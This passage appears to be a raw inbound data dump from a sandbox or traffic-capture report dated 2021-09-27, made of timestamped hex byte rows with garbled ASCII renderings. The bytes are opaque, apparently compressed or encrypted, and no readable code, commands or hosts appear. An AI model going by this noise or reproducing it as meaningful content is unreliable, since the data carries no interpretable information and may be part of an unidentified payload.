e0 59 a6 e5 07 56 ad 84 35 dd 45 ca f1 50 1d df 9d ff 8d 12 f4 97 7f 9c 31 ce e8 0b b2 0a 11 08 f4 e4 f5
                                    Data Ascii: j4~]9!F2:@;\sL4C >0GLBPUG PfJ&L=4,k9q'1U`LQ-`p}aqu=VjETQK.SdG+4|M*JnJheYf`]69Mt;4;0_YV5EP1
                                    2021-09-27 16:40:46 UTC153INData Raw: c5 ac 91 65 44 52 ea ba 84 6e 80 f4 49 ee 8f e0 2d 82 b7 13 1f ad e1 8f ca e5 70 06 9f 62 72 db 94 c2 5e 80 ae b8 62 c4 5e 23 83 67 f3 f4 3d 66 1f 1e 50 2d dd 37 e7 ba 2c 7a e0 f7 64 d6 0b 57 69 be f3 db 92 3e bf 38 f9 18 bb 68 b4 06 50 df bd 42 c6 8e 9b ae 8c 1d 53 f8 5a 6a 7e 74 e2 60 a6 8b 0e b2 56 d2 0e 13 87 9d 77 b1 ca 0b 5e 2b 72 8d 3c d9 b4 de 4a 82 e1 92 12 3d 89 63 5f fd e5 9c f5 88 83 0e a5 e5 36 85 10 79 a8 63 df 9e b2 f5 b4 52 3b 9d 80 fe 33 1f 27 82 44 7d 8b 7b 2a 59 c3 f8 4e d8 11 84 90 3b 94 d8 f1 1e 41 52 66 70 e1 df 88 32 30 a8 6b 49 ed 8c 33 d9 6d 6f 0c 09 1b aa 7f 63 dd c7 fe 9e 6f 52 83 ce 81 6b ee 16 09 00 93 0b 35 a7 80 18 ed 5f 91 81 c6 2d 09 e7 2d 94 75 02 4a 1b a2 27 59 74 90 6b 61 23 62 82 04 ca 9f 76 4a 8b a6 42 1c 9c 57 17 a4
                                    Data Ascii: eDRnI-pbr^b^#g=fP-7,zdWi>8hPBSZj~t`Vw^+r<J=c_6ycR;3'D}{*YN;ARfp20kI3mocoRk5_--uJ'Ytka#bvJBW
                                    2021-09-27 16:40:46 UTC155INData Raw: 85 23 cc 72 9e ee 04 f4 b9 d8 6f 2f 80 86 0e f1 9d 4e 2c 97 4f d6 fc 9f 4d b8 04 8b cc 28 15 85 a9 e9 5e 08 d6 5c 02 39 60 5f 4a 81 db ae e5 3e dd c4 f2 8f b9 39 81 38 78 36 4f 5b 83 53 a3 14 33 88 16 25 60 1e 2a c0 d5 d4 50 18 eb 34 b4 97 cc 7b 64 d2 6d 30 12 09 20 ba 43 e5 35 e7 3a 26 b8 6c d7 3d 8d 44 1b de af 7c 2f 46 b6 16 4d 2c 86 44 6b 0f 30 a2 67 b3 dc 74 2f d8 96 f7 fd 60 f0 30 f2 93 47 84 25 4c 59 07 17 4d 17 14 e6 1e 30 85 ef 1b 39 f9 65 df 3b 72 a9 e1 38 09 19 69 fe 1f 15 8f 73 d2 79 57 b1 14 1d 4e 32 f5 9f f8 eb 16 65 77 9b 4d 4a b8 bc c0 da 16 6c db de 64 7e 72 95 6f 36 f1 74 c6 3d e2 ec 68 5e 97 17 4a 7b d0 46 07 a2 6d c4 6a 4c b0 93 88 da 6c 5e 2e cc 26 30 07 04 e1 c9 71 9c 0d 0c 56 35 a4 70 81 16 86 b8 8b 8d 55 d2 37 0f 45 41 94 ce 38 a3
                                    Data Ascii: #ro/N,OM(^\9`_J>98x6O[S3%`*P4{dm0 C5:&l=D|/FM,Dk0gt/`0G%LYM09e;r8isyWN2ewMJld~ro6t=h^J{FmjLl^.&0qV5pU7EA8
                                    2021-09-27 16:40:46 UTC156INData Raw: 2c 14 e2 1e 71 71 4f 25 cc a9 18 bb 82 9a 85 50 a2 62 a7 2f 8c 67 ff 3e 02 a2 ba 44 8d ec 2c 61 05 43 bf 10 e4 9f e9 7a be 8f f0 71 45 eb 01 35 8f 96 85 8c b8 b5 3d c4 85 46 e4 56 38 eb 02 bf d9 d4 9f de 0a 5d e6 fb 83 7c 78 1d b1 7b 1b e9 07 51 7e c8 dd 79 e9 29 91 aa 13 a4 d7 f8 0b 41 73 41 4f df e6 c4 29 0c 80 52 79 f7 ad 1b c3 47 5e 7a 5f ba 01 db a4 1b 04 18 4e 90 8e 48 4b 08 ef 60 bf ac a0 16 cc c4 41 46 fa 0e ba 56 7f 37 f9 fb e1 08 b2 5e 0f 21 38 a0 0a 73 70 b5 0f 77 1f 49 a4 22 e8 a3 73 52 89 b7 50 0c c0 08 4d fa 3d 34 29 0f 37 eb 79 75 e0 b8 3c 27 d0 3e 90 0f 4c 04 5d 98 fd 86 ca c7 75 81 10 4f 45 52 78 10 ac 46 ce 95 6a f2 27 e6 75 64 26 a5 7d b5 95 ce 38 1b f2 b4 7d f9 95 81 7e 5b 0e 26 55 8d 77 e1 69 b4 0d e4 71 08 61 ca 8d 85 d9 d5 7b ea 68
                                    Data Ascii: ,qqO%Pb/g>D,aCzqE5=FV8]|x{Q~y)AsAO)RyG^z_NHK`AFV7^!8spwI"sRPM=4)7yu<'>L]uOERxFj'ud&}8}~[&Uwiqa{h
                                    2021-09-27 16:40:46 UTC157INData Raw: 8e d9 20 45 d3 74 27 6b 02 10 93 5d 9d 32 e3 66 10 fd 16 a0 57 fc 4f 65 ff d1 32 1e 10 82 18 0b 1f ad 62 57 5c 7a 83 1b 84 eb 4b 7a a3 f3 d6 d4 38 9d 4e c7 9d 20 fe 54 71 05 09 2d 79 3f 32 cd 31 03 86 89 74 17 a7 39 db 59 7f c9 80 5f 0f 34 44 a7 77 14 e6 5f e3 2f 2b c8 56 b3 82 8a 21 3e 64 76 a1 be 98 29 88 90 7c 6d 70 15 ea 89 36 3e 8c 99 a8 53 b4 f4 14 c6 68 ec af 87 24 34 f8 7d 2e 7d b8 39 3e bd 64 b0 58 26 d3 84 e8 b3 0b 72 01 da 58 27 66 03 f7 85 79 8e 7b 38 74 43 c9 14 e7 32 df e9 ec fd 65 e1 07 48 2d 24 e6 b4 66 db 3d e9 31 cc b1 d1 51 a4 db fe 25 50 61 6e d5 24 93 c0 9a 75 41 87 81 ea 16 5c dc 5b 00 c3 f8 b0 db 4a 6b fe 8e 5a 18 34 c4 ab 43 80 8c 40 54 e7 2c 2a 91 15 be ed 34 0a 39 c1 70 a1 4f 06 40 bd 0b 65 27 ae bc 81 ea d2 55 03 a4 bb f6 ce 1a
                                    Data Ascii: Et'k]2fWOe2bW\zKz8N Tq-y?21t9Y_4Dw_/+V!>dv)|mp6>Sh$4}.}9>dX&rX'fy{8tC2eH-$f=1Q%Pan$uA\[JkZ4C@T,*49pO@e'U
                                    2021-09-27 16:40:46 UTC159INData Raw: d5 69 05 0c c0 ff 55 a7 78 ed d4 71 c1 96 87 53 3d 12 23 2b 8f b5 a1 44 79 e0 3c 05 89 d8 4e 8c 29 2f 39 25 83 2c a6 da 70 6b 0a 39 dc c1 06 6a 3c ca 4e d3 88 86 12 de f6 60 49 fa 27 9a 78 41 13 e9 c6 26 cb 0c 94 c5 d4 de 5a ca ab a2 71 a1 a5 f8 90 5c d1 03 5b ba 93 43 5e 87 d8 05 d9 8e 1b dc 3d 72 30 32 e3 77 65 d7 8b 3d 0c cd 3d 89 3d 60 36 3d 9f 99 cc d4 c4 4a ad 2a 6a 6a 5c 41 34 85 6b 93 f3 1d 82 55 cb 38 07 4b 97 7d d5 f4 b0 4e 3d 98 c4 0c cc a2 cf 19 63 1e 70 1c e7 27 8b 40 92 39 de 06 61 0d ce 16 63 d8 fd 4f 84 ee 33 ec e3 9c f4 11 b3 78 05 c9 67 56 59 3b 0b 3d ff 78 ff 1e 8b 13 60 f0 7d d0 4d 94 7a 68 0e 85 56 aa 0c 19 bd e2 f8 72 05 bd eb b8 82 6c 33 47 f4 71 d7 14 ec b5 47 0d c8 8e ea 94 14 7f 11 a1 67 2a 9f cc c2 32 4d 94 89 e0 e5 c4 ac 5e c0
                                    Data Ascii: iUxqS=#+Dy<N)/9%,pk9j<N`I'xA&Zq\[C^=r02we===`6=J*jj\A4kU8K}N=cp'@9acO3xgVY;=x`}MzhVrl3GqGg*2M^
                                    2021-09-27 16:40:46 UTC160INData Raw: 28 2f ac 26 23 c7 41 88 3e 61 89 2d af ff f7 34 2c 3b 53 a4 b6 f4 76 81 83 7e 46 57 2f ce e6 30 17 ac a1 ad 79 a7 d6 3c c9 6c d2 6e 62 f8 c2 10 89 ea 98 4d dd 86 43 9a 5a d9 ee 38 62 11 5d f7 ce b8 0b bd d8 90 e6 01 4b ad b1 05 54 09 60 e2 37 d4 0b d0 d0 ca c9 2a 9f 26 61 09 1e d0 85 51 e6 07 d1 16 bf c9 ad 23 a6 e7 e0 4f 2d 30 18 bf 15 cb f0 a9 04 22 f7 e4 97 35 01 a0 3f 70 a6 fc 92 f4 79 5d 94 fd 22 24 02 f9 f3 3d 99 a6 46 56 8e 4e 74 ef 77 ba c0 58 61 05 fa 4e 91 39 63 0e cb 1a 40 1a bc 88 a4 cc eb 6c 1d 17 59 5a 61 b5 5a d8 26 41 35 1e 48 7c 8b 24 3e 5b 94 8e a1 3c d1 f5 31 1e d1 18 6f 7f 18 4a 38 d8 74 0a e2 f7 fc 7a 98 2c 9b 4a 27 ef b1 28 3d b8 c5 db b9 a2 4e 47 01 86 d2 c4 33 60 57 ac 22 2d cd 21 66 0f 91 33 00 d0 fa 70 61 2d 65 5f c9 ef 62 fa c5
                                    Data Ascii: (/&#A>a-4,;Sv~FW/0y<lnbMCZ8b]KT`7*&aQ#O-0"5?py]"$=FVNtwXaN9c@lYZaZ&A5H|$>[<1oJ8tz,J'(=NG3`W"-!f3pa-e_b
                                    2021-09-27 16:40:46 UTC161INData Raw: cd 99 d2 8c 78 e5 2e 37 92 a5 7f 49 ec e4 26 f9 ba 18 a5 d9 cc ea da 1e 90 d3 33 79 ce ca 27 c5 74 d8 d6 dd 84 4d 24 7d 1f 39 90 78 ee af e3 b3 86 9c 8d 6d cf 98 07 e3 6a c3 13 09 55 9f 41 c6 e4 df 1c 7d 9c d0 1a d6 a2 df 16 6a 49 59 6b aa 39 89 35 fb 78 82 44 25 49 82 ee ec 99 b0 0b d0 69 b0 88 2e 2f ce 29 8f 1c 6c b1 5d d8 ea 4e 76 49 99 c3 05 28 ab 96 94 c1 42 f3 70 a0 5b 14 68 f7 2f 91 74 71 d6 a5 f4 15 7c 8d 9f be e1 5e 06 5b c2 74 2c ec 37 11 cd a7 4d 25 1a 2a f8 84 a8 4c 9b da 6c 20 4f e7 ba 1f 00 58 51 2e 17 e8 2c 7d ba ac 87 50 df 96 a2 ae 62 42 50 59 3c 76 d4 e2 7e 62 91 a2 47 22 89 01 cf c7 f8 7c 5e 21 62 e7 78 9a 8f 72 b9 1e 62 42 23 ef 3f 7c ea 29 d0 36 e7 2a 8e 6c 1f f0 40 5f 63 9b eb 61 18 9b 2f 5e 8c 91 3d b7 26 05 0e b2 4d 9b 71 20 a3 ef
                                    Data Ascii: x.7I&3y'tM$}9xmjUA}jIYk95xD%Ii./)l]NvI(Bp[h/tq|^[t,7M%*Ll OXQ.,}PbBPY<v~bG"|^!bxrbB#?|)6*l@_ca/^=&Mq
                                    2021-09-27 16:40:46 UTC162INData Raw: d8 e8 fb 6e e2 98 44 fc 55 1e f0 1a a1 ea fb 92 d2 11 60 c4 dc b0 26 03 61 c0 06 4f 92 7c 2b 7f f0 c0 04 c0 1c bf 80 2c 90 cd dc 31 54 76 50 5c cf f0 9e 38 06 92 f7 fb ed ba 27 a4 5e 59 30 bf 85 31 aa f2 79 65 7b 55 89 b1 6a 0c 4a b2 40 86 83 8b 53 4a ef 7c 4f cd 3e 98 5d 1e 41 b0 98 22 d3 76 fa 5c eb e7 a7 e8 bf b3 5c cb fe a6 e1 69 ea 35 68 8c a1 79 5d b1 fa 28 bd 14 bc f9 ce e4 c8 fa 3e 51 bf 26 5b ec 2e 03 e2 43 f8 ac e9 b2 66 17 17 37 37 87 e3 ea bb fb e4 92 e9 5c c1 57 0b f1 78 bb 67 f8 11 a3 7b a0 b3 12 5a af b0 67 3d e1 24 4d 36 f6 91 b7 af fd 16 c2 7e f5 3e b2 5f 83 e0 80 41 38 66 5f 78 c8 7c cd 48 61 d4 d6 65 82 2f eb 94 5a d4 66 1f ba a6 b8 78 48 ab a1 36 19 13 49 c6 65 fe 2d 8b 9b b6 76 a7 59 e8 fa 5c 0b 73 80 f7 1e 18 2b ce 8a c1 ce 06 8e d5
                                    Data Ascii: nDU`&aO|+,1TvP\8'^Y01ye{UjJ@SJ|O>]A"v\\i5hy](>Q&[.Cf77\Wxg{Zg=$M6~>_A8f_x|Hae/ZfxH6Ie-vY\s+
                                    2021-09-27 16:40:46 UTC163INData Raw: b0 8a 57 90 77 7f 53 2f 26 67 12 3e 8f 4f 34 8b b3 4e d1 fd 04 de d5 7a 5f 90 46 15 c4 2a 9f 5f 1c e4 f4 a8 25 02 cc 72 a2 a8 90 29 04 15 47 a2 e9 a0 53 88 3b 72 aa 5f 25 df aa 1a c4 af b0 a6 07 a2 df 23 f2 48 ff 43 74 c8 e8 33 5e f4 74 72 ef b0 d1 a4 ba da f6 0c c5 38 35 c3 f9 81 db bb 57 86 dc 31 cb b9 4b cf 8c d0 98 07 e9 1d dc 2f 8f 22 30 ee 50 f0 c4 ca a3 3d 7d a7 bb e0 9c ce 43 1d d7 9b cc 24 3f aa 64 dc 6d 4d 9b 0b 7e 6a 7f dd 1e 11 17 9c 7c 54 d9 9d e5 43 bb 41 d0 fc b8 53 1e 9a a0 42 b7 c5 f8 01 fa e9 b8 88 79 27 b1 13 91 c3 ab 8a 67 d8 ed d0 fd f1 11 a4 db 82 1e 2f 37 4f 37 d4 85 cf f2 e0 e0 33 35 63 8b f1 58 b7 93 ab 43 b1 b6 cb 90 1d 54 a2 a0 6f dd a4 3d e9 32 e7 62 d6 21 8b 08 0a 00 c8 95 38 e2 7b e2 3b 73 98 75 73 53 f1 95 86 a3 e4 d6 12 4c
                                    Data Ascii: WwS/&g>O4Nz_F*_%r)GS;r_%#HCt3^tr85W1K/"0P=}C$?dmM~j|TCASBy'g/7O735cXCTo=2b!8{;susSL
                                    2021-09-27 16:40:46 UTC164INData Raw: 86 83 8a 09 05 ef c7 5e cf 3f 98 7e 1a 10 f9 dc 23 d1 8c 92 5e ea e5 4b c4 bf 50 60 89 92 d4 83 63 eb 8e 69 8e a0 79 5f 26 fb 22 ea aa 1d d0 c6 36 c9 f8 3e ab be 0f 5c fa ea 1e e3 5a f9 70 e1 b1 66 17 43 40 33 87 7a f6 bb dd a6 49 e8 59 bd 57 0b fc 5f bb 67 e5 e4 88 7a 47 25 17 5a bf 89 c6 39 e1 3d 50 36 df 91 5a ae ff 14 c2 7e b1 14 b3 5f 9e ee b6 40 d7 27 5d 78 c8 05 06 4c 61 dd cb 65 ba 27 1d 95 58 fb 66 1f 2d 8d b8 78 49 a8 99 37 e1 13 4b c6 65 f6 43 aa 9b fb 6b a7 66 e0 02 5d 09 79 80 f7 eb 1c 2b 71 84 c0 8d 07 8c d7 14 9f e7 34 d1 9d df ef 91 0e 39 0a b0 6e 32 8e da f7 27 56 f7 e5 af b4 d4 f0 03 9d 9b 5e b6 cf 81 e8 88 bc af 7c 46 17 1a 2c 7c 96 a4 3c 64 c0 f8 1f 71 99 03 92 87 bd 18 0b 65 26 75 12 fe f4 1a c1 3e 1b 3f 5e 83 10 1f 83 d7 b1 59 8e 2e
                                    Data Ascii: ^?~#^KP`ciy_&"6>\ZpfC@3zIYW_gzG%Z9=P6Z~_@']xLae'Xf-xI7KeCkf]y+q49n2'V^|F,|<dqe&u>?^Y.
                                    2021-09-27 16:40:46 UTC166INData Raw: 72 ee f8 7a f9 fb 04 f1 44 53 70 ef 97 f4 c9 0a d9 66 56 d6 7b 73 a2 4d 6f 89 c0 bb 74 69 8a db 62 2b 53 8c c7 5d bd b6 93 49 df 5e ea 2a 98 86 87 66 50 71 e2 d6 cb 1c e7 d7 80 77 85 be 46 0d 12 65 ac 16 5c 76 d6 66 ac da d0 56 5f 27 e6 dc ef 31 14 04 0a a7 24 36 ba b9 01 fb 8f 53 c4 38 f9 b6 75 57 dd f1 19 60 93 0e f3 ad 56 16 b4 df 86 22 06 36 5f 74 f7 b9 6b f5 70 c6 1a f4 ee 8c e7 83 bb ea ac 42 a7 88 ee 34 b9 53 b1 75 4b 8b 19 3d fa f3 aa 23 5b 26 be 4e 7f 41 c8 94 0d cb 37 5e cc 74 ad eb 2f ef 92 94 b3 c9 be 97 fe 4b c6 8f c2 e2 eb 01 c2 43 7d 4f 08 05 46 f6 02 24 24 8e 35 20 04 95 bf b3 d9 11 f3 32 14 59 02 cd 2c d4 c8 91 6a eb d7 af 80 0a 18 8b 99 2f 5f e4 d4 26 de d6 da 83 c9 4e 1d 58 00 ad f3 80 1e 69 3f d1 38 b8 77 77 94 e0 46 df 23 ba bb b1 06
                                    Data Ascii: rzDSpfV{sMotib+S]I^*fPqwFe\vfV_'1$6S8uW`V"6_tkpB4SuK=#[&NA7^t/KC}OF$$5 2Y,j/_&NXi?8wwF#
                                    2021-09-27 16:40:46 UTC167INData Raw: 84 55 0d f1 af bc 55 fa e2 a1 ec a1 b4 0f 5c af 1e 66 0f e3 3b 4d 2c f1 a2 b5 a9 fd d0 c3 4c f7 33 b3 0f 84 dc 82 47 38 b1 5e 06 d7 03 cd df 60 e4 d4 63 82 3c ec ad 58 fc 66 e9 bb be ba 7e 48 3d a0 05 35 14 49 51 64 e3 01 8d 8b 6c 77 b7 5b e7 fa cb 0a 6a 82 f1 1e 8f 2a 62 9b c6 ce 1c 89 c6 14 99 e7 a3 5e 8a dd e9 8c ca 73 18 ba 6a 30 94 cd c5 03 55 f7 b5 b5 a7 9a f7 0e 5b 98 6c b4 c9 48 35 89 af b0 7a 0b 46 07 1c 7c 91 a4 ed 33 d6 fa 19 70 f3 4c 80 9b b9 1a 9d 64 35 a5 24 fe 0b 12 d0 61 1c 21 cb 88 02 1d 85 4a ae 5e 9d 5d f4 1d ac 9c 62 2b 0b f6 01 2c 3b a7 56 25 7d 8e 0a bc 24 0e 8a ba 5d 98 61 39 25 fc 7e 43 18 b8 84 37 db fb d7 f7 0b 57 97 c4 b6 fd 78 c4 ce e0 ec a0 b6 9f b9 0a 7c 1b 93 d5 bc e9 0d 4c 50 40 ef 32 52 69 9d 80 f2 56 50 8a 5c d1 b6 b0 45
                                    Data Ascii: UU\f;M,L3G8^`c<Xf~H=5IQdlw[j*b^sj0U[lH5zF|3pLd5$a!J^]b+,;V%}$]a9%~C7Wx|LP@2RiVP\E
                                    2021-09-27 16:40:46 UTC168INData Raw: f0 eb 5a 4b 95 9d 42 21 28 ec 39 1b ed e9 da 93 3e 34 a6 13 d9 a7 f1 8e 61 d8 1d f2 3a c0 4e a7 cc 87 0e 70 31 4f 76 f6 af fc 63 e1 36 12 e5 79 09 80 9d ba ea b6 53 b1 01 ee 62 24 40 a2 12 39 8d b9 3b e9 e7 fc 34 cd 8f 81 45 29 41 a7 93 38 d4 61 c8 08 e2 99 1d 73 7a c2 c3 f0 d6 e8 17 08 5c f3 c0 93 72 31 11 f7 6c 5c cf 60 07 73 ff 04 38 83 57 2e 35 52 61 5f b2 97 0e a5 a4 0e 9a 4d 9d 71 43 0c 84 5d f4 81 2f d0 1b 56 03 ce f1 a2 f2 9a b5 f1 56 0b 84 87 47 4b c2 6f 67 b6 88 48 f1 be d8 76 a7 21 e1 0b 26 09 34 7e 2d 85 11 36 9a da cd e3 9a 75 f0 aa 13 3a 2e 36 f4 05 d6 ee e7 cb 2d 9f f2 73 d9 f5 03 de ba 65 34 45 95 f1 55 8e 54 a4 17 f5 8d ec 5c df f6 1f 2c 91 9c f2 d4 9d 70 18 92 e5 8a 12 26 75 8b 6d c2 89 72 e3 70 63 38 97 de 76 27 03 60 c0 10 4f 05 7d cd
                                    Data Ascii: ZKB!(9>4a:Np1Ovc6ySb$@9;4E)A8asz\r1l\`s8W.5Ra_MqC]/VVGKogHv!&4~-6u:.6-se4EUT\,p&umrpc8v'`O}
                                    2021-09-27 16:40:46 UTC169INData Raw: 9b ee df 5c 0b 79 80 f7 1d 18 6d 72 f9 cb 01 09 ab d5 16 9f e7 34 5c b8 99 ec e3 05 0e 04 9d 6c 5b 14 ca f7 01 53 e6 fd 8e 91 1e f1 2b 9f 2d 7c b6 cf 48 c3 8e a4 84 59 18 16 25 2e f6 0d a4 3c 34 c5 eb 1f e7 9a a8 9c bc bf 52 91 65 26 ba 22 ef f4 01 c4 e5 1a 04 5c 79 8f 1f 83 4a b4 48 8e 9b f3 fb 67 b8 71 6d 92 e6 96 2d 2b b4 50 75 ed 09 38 9b 22 62 bc bb 4e 9a 60 28 b2 6a 6f 1c 09 9d 9e 98 69 f9 d6 f7 cf 47 87 51 b6 76 38 e6 de 92 49 a0 21 9e 59 1a 7a 01 03 5f 0d cb 0b f8 e5 41 72 35 41 6e 86 b6 a8 69 43 af 5e 0d 59 b2 56 36 a3 11 45 e6 6c b0 c0 0e ca 6b 1f 10 7a 90 45 e1 03 33 16 25 83 b0 5d 58 c4 ee 52 61 70 c4 19 b3 29 22 e6 66 e3 b0 8c 11 e7 ac bc ad 48 f3 28 7b a1 63 90 a3 f7 43 06 34 67 25 2e 5b 67 6c 9a be 60 bf 50 0e de 4f 76 d4 8f 68 30 f0 03 a9
                                    Data Ascii: \ymr4\l[S+-|HY%.<4Re&"\yJHgqm-+Pu8"bN`(joiGQv8I!Yz_Ar5AniC^YV6ElkzE3%]XRap)"fH({cC4g%.[gl`POvh0
                                    2021-09-27 16:40:46 UTC171INData Raw: 12 d4 01 c3 09 75 98 f4 6a 6f 55 92 f6 de c2 17 14 54 f2 90 94 62 29 06 cd 5a db de 4a 07 2f ca 05 22 84 88 35 22 02 12 9e b6 bd 0e 3d 97 0f 5e 4c d2 69 54 ff 92 34 ff ab 2f 54 2b 57 94 cf af ba e5 0d 38 3d 4d 21 84 7b 77 4a d8 68 af ae 9f 77 db 26 da 5c a7 45 d0 0a e2 08 c0 66 3a 73 a4 93 81 f0 cd 07 ab 74 06 ab 0c 25 39 52 f2 f5 c7 c4 67 d7 11 be 65 72 ff ea 14 49 bb 48 28 6f 15 2d 6e af c3 a5 26 ea 9a 1a 69 bc f4 35 2c 91 a6 f3 af 9e 96 09 88 3e 1e 61 37 5f 8b f1 f8 88 a3 e4 ab 72 22 19 90 02 36 29 60 a0 29 4e 92 7c 27 6c f0 c5 47 04 23 a5 ae 0b 92 ff ed 08 54 65 50 cb ca 26 e2 12 06 3a 69 79 ed ba 04 c9 5e 02 3d cb 94 1b e6 03 4d 64 58 06 fd d0 03 df 2b 31 51 ac 83 9b 3d f2 ef 7c 5f de 3e 36 7f a9 05 d3 dc 7a e4 77 92 e5 eb f6 4b 2e aa 68 7d a3 92 6d
                                    Data Ascii: ujoUTb)ZJ/"5"=^LiT4/T+W8=M!{wJhw&\Ef:st%9RgerIH(o-n&i5,>a7_r"6)`)N|'lG#TeP&:iy^=MdX+1Q=|_>6zwK.h}m
                                    2021-09-27 16:40:46 UTC172INData Raw: ae bb f5 1b c3 63 1c 29 fa 86 89 1c d0 4a 2c 1c 8f 5f f2 1d 6e 95 c3 08 bc e2 c2 2d e7 e0 51 25 ea 8f 3e b6 9f 2f a1 bf 1a 9a b8 7c b3 fd 6e 41 1f b0 bd 2c 82 f8 83 f7 c3 10 86 c6 b7 fd 2e cb f1 fe 2a a0 74 9e 41 4d 7b 1b 04 d4 1b e6 56 42 ef 5f 24 35 0d 2e 9f 80 8d 7a 45 82 30 df d3 ac 00 36 fb 44 44 71 6d 50 c1 33 f6 4a 3e 10 2d 90 f1 d5 03 a4 17 35 8e 8e 6b 51 7f ee 05 61 d0 98 18 24 28 14 e4 40 74 89 aa 0f b0 ac 30 f7 49 e9 2f a0 b2 45 07 36 e8 47 51 34 83 7f 2f 9f 66 3e 98 98 f7 4a 4c 10 89 4f 9e 88 96 54 15 76 12 8f e1 03 78 17 f9 19 05 9c 73 81 a7 ac 0b 02 82 74 46 8e ea 55 3c a1 68 6b 45 23 d9 a9 30 20 a6 b6 f1 46 c4 bb 04 f4 48 cd 71 5e 47 ef e0 be a3 b5 68 a6 b1 64 af 7b d3 f0 9b 4c cc 6d 90 f3 95 46 8e e6 a0 d7 35 75 92 6e d3 90 84 b9 76 bb 1c
                                    Data Ascii: c)J,_n-Q%>/|nA,.*tAM{VB_$5.zE06DDqmP3J>-5kQa$(@t0I/E6GQ4/f>JLOTvxstFU<hkE#0 FHq^Ghd{LmF5unv
                                    2021-09-27 16:40:46 UTC173INData Raw: 9e 48 e9 c0 ce 76 30 20 c6 2f 93 08 78 fb 3b 85 a5 48 8c da 5a e2 cf 51 74 ab 7c b9 38 36 f4 05 c0 ee f0 ca 65 9b 11 72 df 69 15 de ba 65 22 45 82 f0 35 8a b7 a5 5e 69 9b ec 68 5c f0 1f bb 90 0d d6 da 9e 2a 8a 89 e5 2a 91 20 75 1c 6c 4e ad d5 e4 53 f1 23 97 96 f2 26 03 7a c7 9c 6b e5 7c eb ee f1 c0 72 f4 34 8f b4 18 67 da 95 08 e0 e4 51 5c cb f0 f8 38 1c 95 48 78 94 ba ec 4e 5f 59 3c 3b 83 31 22 c6 73 40 21 06 01 55 02 62 2d c1 46 86 14 8a 21 d6 96 7c b7 5a 3f 98 7e 59 12 f9 4b 23 e1 53 eb e5 cb 7f 4a c4 bf b3 7e 89 88 ce b1 4c 93 35 7c 15 a0 79 5f b1 fc 22 7d aa 75 e3 be ea a8 63 3f ab be 15 4d fa 7d 02 7a 66 82 ac 7c 29 67 17 43 37 36 87 ed ea 09 de dd 97 99 c7 bc 57 0b f1 7f bb f0 f9 36 84 01 a0 d8 8f 5b af 89 67 3c e1 27 4a e4 d3 ea b7 1b 5c 15 c2 7e
                                    Data Ascii: Hv0 /x;HZQt|86erie"E5^ih\** ulNS#&zk|r4gQ\8HxN_Y<;1"s@!Ub-F!|Z?~YK#SJ~L5|y_"}uc?M}zf|)gC76W6[g<'J\~
                                    2021-09-27 16:40:46 UTC175INData Raw: 4c c7 57 72 2f 46 62 b2 fd 8d fe b4 8b 5e d1 fd b4 4e 00 86 21 66 0c 6d cc 27 2a ca 6f b8 16 62 a6 60 a6 2f d9 17 a1 70 97 5d 74 6c 88 51 15 60 c1 19 59 28 c9 0e 41 e3 88 25 17 ff 9a 99 7b 48 94 2f 14 81 45 90 37 5e 45 1e 02 42 20 2e e2 66 3e 71 99 60 4b fa 0d d6 08 7b 8c 96 29 15 42 f9 8e 76 02 e4 10 a6 4d 3c 12 72 fc a7 ec e0 03 15 75 82 93 b5 98 81 ca 69 16 45 57 25 b0 06 05 b5 b5 ae 9c b9 35 05 89 48 4d 9a 5f d0 ee 33 a3 fc 09 6b a0 b1 19 af cf 3a f1 0c 4d 26 6c cf 37 82 d4 8f 9b a0 17 c9 6c a4 4b cf 8c db 08 01 a0 1c a7 2f c1 ff 0d dd 5a f0 ab cd 74 38 9f a7 49 ce fb 2d 60 1d 6f b4 50 25 2b 8f b1 d1 8a 54 a5 f0 12 44 e5 c4 02 11 ff 81 91 7f ae 9d 9c a2 20 46 da fc a2 42 87 9d 22 6e 55 ec 16 e7 fd e9 4d 92 2e 3d 20 12 af ce 8c 8e 25 24 0d f2 ad c1 81
                                    Data Ascii: LWr/Fb^N!fm'*ob`/p]tlQ`Y(A%{H/E7^EB .f>q`K{)BvM<ruiEW%5HM_3k:M&l7lK/Zt8I-`oP%+TD FB"nUM.= %$
                                    2021-09-27 16:40:46 UTC176INData Raw: 1f a3 e2 af 87 20 ea 96 c4 23 01 60 c0 06 d9 92 02 3d 99 f2 bd 72 a6 36 8d ae 1f a0 68 ed 38 50 90 52 21 cb 9d fa 3a 06 92 5b ee ed 87 1f 3c 5c 24 3c b2 81 33 e6 c7 79 f3 58 62 f9 25 01 1f 2d 64 44 84 83 8b 0b 65 ef 77 7f 2b 3c e5 7e 98 10 fb dc 22 d3 e0 92 6b ef 01 49 b9 bf 6f 7b 8b 92 c9 83 ff ea 1d 49 6a a3 04 5f 46 fe 20 ea ab 1f 50 c7 52 cc 1c 3c d6 be 07 5e f8 ea 03 e3 d5 f8 f7 c1 55 64 6a 43 1a 32 85 7a eb bb 6d a7 75 ed ba bf 2a 0b b9 7b b9 67 f8 e4 37 7b 65 05 f4 58 d2 89 03 38 e3 3d 4d 36 60 90 a4 aa 1b 16 bf 7e 75 30 b1 5f 83 ee 16 41 9d 03 b9 7a b5 05 51 4d 63 dd d6 65 14 26 d6 91 bc f8 1b 1f 02 89 ba 78 48 aa 37 36 17 3e af c4 18 f6 f9 8e 99 fb 76 a7 cf e1 70 59 ed 7b fd f7 ee 1d 29 71 99 c0 58 06 68 e5 f0 9d 9a 34 54 be dd ef 8c 0e e4 0b 7a
                                    Data Ascii: #`=r6h8PR!:[<\$<3yXb%-dDew+<~"kIo{Ij_F PR<^UdjC2zmu*{g7{eX8=M6`~u0_AzQMce&xH76>vpY{)qXh4Tz
                                    2021-09-27 16:40:46 UTC177INData Raw: c6 2a 6d 9a 1d 4b c1 01 dc 4f 76 c5 01 54 18 75 e5 8d 0b 02 b8 1c ac 19 31 d2 e4 81 a3 ba fc 00 68 75 ff 9f bf 55 88 83 fe 6b 04 20 39 b3 7b 05 2b b9 a4 46 b0 f5 93 f4 4f da 86 5c ad ee f3 af f6 b5 68 e9 26 64 c4 78 26 f2 71 4d c7 60 c5 f3 81 14 19 e6 e4 c0 d5 6f d9 4b cc 9f d1 b9 22 e9 8b da ba 36 e3 0e a0 5a d5 b8 c7 c9 1b 5f 31 34 a0 11 31 63 60 6f f2 46 3f 1d aa c9 40 f7 8b ba ed 11 39 e5 a3 04 13 68 80 e6 c5 d3 28 50 bf 23 3b da 74 23 40 84 9d a6 d4 28 e5 3d fd fe 94 4d 38 a8 3f b7 13 49 5a f1 0f 7b 3e 0e 8f ad 0a 07 a6 dd 87 22 8a 31 7c 72 10 bb 